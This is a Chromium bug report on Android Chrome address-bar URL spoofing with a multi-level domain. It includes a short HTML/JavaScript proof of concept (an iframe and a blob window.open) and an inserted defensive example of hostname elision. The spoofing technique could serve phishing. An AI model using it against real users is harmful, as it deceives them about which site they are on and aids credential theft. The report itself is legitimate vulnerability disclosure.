Security: Address Bar URL Spoofing With Multilevel Domain Name
Reported by xis...@gmail.com, May 17 2017
Issue description

VULNERABILITY DETAILS
I think this bug might be different from issue 646278 and issue 721184. On Android phones, the Chrome address bar has limited visual display space, and an attacker can target a multi-level domain name, such as news.facebook.com.xisigr.com. When the user opens it, the spoof domain name (news.facebook.com) will appear in the address bar, and the real domain name (xisigr.com) will be hidden. Of course, the length of the spoof domain name is limited by the size of the user's phone screen, but in targeted attacks, this domain name spoofing is feasible.

VERSION
Chrome Version: [58.0.3029.83] + [stable]
Operating System: [Android]

REPRODUCTION CASE
This POC is written on the basis of my test phone screen size, just to prove the feasibility of the attack.

(1) Open http://xisigr.com/test/spoof/chrome/blob_click.html in Android Chrome

----blob_click.html---
<iframe src="http://news.facebook.com.xisigr.com/test/spoof/chrome/blob_3.html" frameborder="0" noresize="noresize"></iframe>
----blob_click.html---

(2) Click the button "Click me"

----blob_3.html---
<script>
var bb = function(){
  args = ['<h1>spoofing</h1>'];
  b = new Blob(args, {type: 'text/html'});
  window.open(URL.createObjectURL(b));
};
</script>
<a href="javascript:void(0)" onclick='bb()'><h1>Click me</h1></a>
----blob_3.html---
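The display problem in the report above, next to one defensive way to elide a long hostname, as an added example (not part of the original report and not Chromium's code). The function names are hypothetical, and SUFFIXES is a constructed stand-in for the Public Suffix List.

```javascript
// Constructed, minimal stand-in for the Public Suffix List (assumption:
// production code would load the full list).
const SUFFIXES = new Set(["com", "org", "net", "co.uk"]);

// Registrable domain = longest matching public suffix plus one label.
function registrableDomain(host, suffixes = SUFFIXES) {
  const labels = host.toLowerCase().split(".");
  for (let i = 1; i < labels.length; i++) {
    if (suffixes.has(labels.slice(i).join("."))) {
      return labels.slice(i - 1).join(".");
    }
  }
  return host.toLowerCase(); // no known suffix (e.g. IP literal): keep it whole
}

// Left-anchored truncation, the behaviour the report describes: the leading
// labels fill the available width and the end of the hostname is cut off.
function truncateTail(host, maxChars) {
  return host.length <= maxChars ? host : host.slice(0, maxChars - 1) + "…";
}

// Elide from the left instead, so the registrable domain is never hidden.
function elideHead(host, maxChars, suffixes = SUFFIXES) {
  host = host.toLowerCase();
  const domain = registrableDomain(host, suffixes);
  if (host.length <= maxChars || domain === host) return host;
  // Subdomain labels to the left of the registrable domain.
  const sub = host.slice(0, host.length - domain.length - 1).split(".");
  let shown = domain;
  // Add whole labels right-to-left while they fit (1 char for ".", 1 for "…").
  while (sub.length &&
         sub[sub.length - 1].length + 1 + shown.length + 1 <= maxChars) {
    shown = sub.pop() + "." + shown;
  }
  return "…" + shown; // the domain is kept even if it exceeds maxChars
}

// Check usable in UI tests: does the rendered text end with the real domain?
function showsRegistrableDomain(display, host, suffixes = SUFFIXES) {
  return display.endsWith(registrableDomain(host, suffixes));
}
```

With an 18-character budget, truncateTail renders the report's hostname as "news.facebook.com…", while elideHead renders "…com.xisigr.com".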
Sep 23 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Comment 1 by elawrence@chromium.org, May 17 2017